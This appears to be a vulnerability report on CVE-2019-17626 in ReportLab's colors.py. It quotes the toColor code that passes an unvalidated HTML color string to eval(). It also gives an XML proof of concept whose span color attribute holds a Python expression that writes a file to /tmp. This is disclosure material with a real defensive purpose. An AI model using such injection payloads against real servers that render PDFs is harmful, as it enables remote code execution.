I was looking at the source code of colors.py and found one instance where the
toColor class is evaluating the html color code without any validation. There is a CVE assigned for this issue as well - CVE-2019-17626
elif isStr(arg): arg = asNative(arg) C = cssParse(arg) if C: return C if arg in self.extraColorsNS: return self.extraColorsNS[arg] C = getAllNamedColors() s = arg.lower() if s in C: return C[s] try: return toColor(eval(arg)) <--- Here except:
I wrote a PoC and verified the same with the following XML:
#!xml <myroot> <label>hello-world</label> <row1> <html> <span color="open('/tmp/colors_poc.txt','wb').write('hello world!')">abcdef</span> </html> </row1> </myroot>
Suppose a web server is using reportlab to allow users to generate pdf of XML docs (the code similar to above), when an input like above is used, the function in colors.py will be called which will trigger the eval sink and hence will create a colors_poc.txt file under tmp directory of the server.